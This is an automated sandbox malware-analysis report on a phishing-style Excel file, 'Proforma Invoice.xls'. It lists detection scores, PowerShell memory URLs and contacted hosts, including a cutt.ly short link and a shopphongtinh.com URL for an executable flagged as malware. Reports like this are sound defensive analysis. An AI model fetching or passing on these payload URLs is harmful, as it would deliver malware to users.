This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Proforma Invoice.xls14%VirustotalBrowse
Proforma Invoice.xls21%ReversingLabsDocument-Word.Downloader.Powdow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cutt.ly1%VirustotalBrowse
shopphongtinh.com5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://www.a-cert.at0E0%Avira URL Cloudsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%Avira URL Cloudsafe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%Avira URL Cloudsafe
http://www.certifikat.dk/repository00%Avira URL Cloudsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://www.chambersign.org10%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%Avira URL Cloudsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
http://repository.infonotary.com/cps/qcps.html0$0%Avira URL Cloudsafe
http://www.post.trust.ie/reposit/cps.html00%Avira URL Cloudsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
https://cutt.ly/ZhqUH1OPE0%Avira URL Cloudsafe
http://ocsp.infonotary.com/responder.cgi0V0%Avira URL Cloudsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.sk.ee/cps/00%URL Reputationsafe
http://www.globaltrust.info0=0%Avira URL Cloudsafe
https://cutt.ly/ZhqUH1O0%Avira URL Cloudsafe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://www.valicert.10%Avira URL Cloudsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://www.ssc.lt/cps030%URL Reputationsafe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%Avira URL Cloudsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://ocsp.pki.gva.es00%URL Reputationsafe
http://crl.oces.certifikat.dk/oces.crl00%Avira URL Cloudsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.dnie.es/dpc00%URL Reputationsafe
http://www.rootca.or.kr/rca/cps.html00%Avira URL Cloudsafe
http://www.trustcenter.de/guidelines00%Avira URL Cloudsafe
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.globaltrust.info00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
https://www.catcert.net/verarrel0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
http://www.disig.sk/ca0f0%URL Reputationsafe
https://shopphongtinh.comp0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cutt.ly
104.22.0.232
truetrueunknown
shopphongtinh.com
202.92.6.10
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.a-cert.at0Epowershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.e-me.lv/repository0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.acabogacia.org/doc0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
    		high
    http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000007.00000002.2124523308.000000001B881000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.certifikat.dk/repository0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.chambersign.org1powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://repository.swisssign.com/0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
      		high
      http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      https://cutt.ly/ZhqUH1OPEpowershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.sk.ee/cps/0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.globaltrust.info0=powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		low
      https://cutt.ly/ZhqUH1Opowershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2119937468.0000000002D53000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://servername/isapibackend.dllpowershell.exe, 00000007.00000002.2125198835.000000001D2B0000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		low
      http://www.valicert.1powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		low
      http://www.ssc.lt/cps03powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpfalse
        		high
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ocsp.pki.gva.es0powershell.exe, 00000007.00000003.2109444945.000000001D10A000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.certicamara.com/dpc/0Zpowershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
          		high
          http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
            		high
            http://www.dnie.es/dpc0powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.trustcenter.de/guidelines0powershell.exe, 00000007.00000003.2109387662.000000001D101000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.globaltrust.info0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000007.00000002.2125080589.000000001D0D4000.00000004.00000001.sdmpfalse
              		high
              http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpfalse
                		high
                http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000007.00000002.2124553367.000000001B89D000.00000004.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2115822325.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2150939891.0000000002390000.00000002.00000001.sdmpfalse
                    		high
                    https://www.catcert.net/verarrelpowershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.disig.sk/ca0fpowershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.2114281314.000000000015F000.00000004.00000020.sdmpfalse
                      		high
                      http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpfalse
                        		high
                        http://www.signatur.rtr.at/current.crl0powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpfalse
                          		high
                          https://shopphongtinh.comppowershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sk.ee/juur/crl/0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.quovadis.bm0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.firmaprofesional.com0powershell.exe, 00000007.00000002.2114281314.000000000015F000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cutt.ly/powershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.netlock.net/docspowershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2124527603.000000001B888000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000007.00000002.2125074123.000000001D0C5000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://shopphongtinh.compowershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                            		high
                            http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000007.00000002.2125080589.000000001D0D4000.00000004.00000001.sdmpfalse
                              		high
                              http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpfalse
                                		high
                                http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.entrust.net03powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.acabogacia.org0powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.valicert.powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cutt.lypowershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.litespeedtech.compowershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmpfalse
                                    		high
                                    http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://shopphongtinh.com/Ubnccbruoun7.exepowershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl.securetrust.com/STCA.crl0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.icra.org/vocabulary/.powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.quovadisglobal.com/cps0powershell.exe, 00000007.00000002.2125074123.000000001D0C5000.00000004.00000001.sdmpfalse
                                          		high
                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                                            		high
                                            http://investor.msn.com/powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.valicert.com/1powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.%s.comPApowershell.exe, 00000007.00000002.2115822325.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2150939891.0000000002390000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ocsp.quovadisoffshore.com0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                202.92.6.10
                                                		unknownViet Nam
                                                		45899VNPT-AS-VNVNPTCorpVNfalse
                                                104.22.0.232
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:320373
                                                Start date:19.11.2020
                                                Start time:09:55:38
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 6m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Proforma Invoice.xls
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • GSI enabled (VBA)
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal92.expl.evad.winXLS@13/11@2/2
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 5
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xls
                                                • Changed system and user locale, location and keyboard layout to French - France
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.0.174.185, 23.0.174.200, 8.248.115.254, 8.238.85.126, 8.241.126.121, 8.248.113.254, 8.250.153.254
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:56:48API Interceptor460x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                202.92.6.10Invoice.xlsmGet hashmaliciousBrowse
                                                • shopphongtinh.com/client.exe
                                                SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
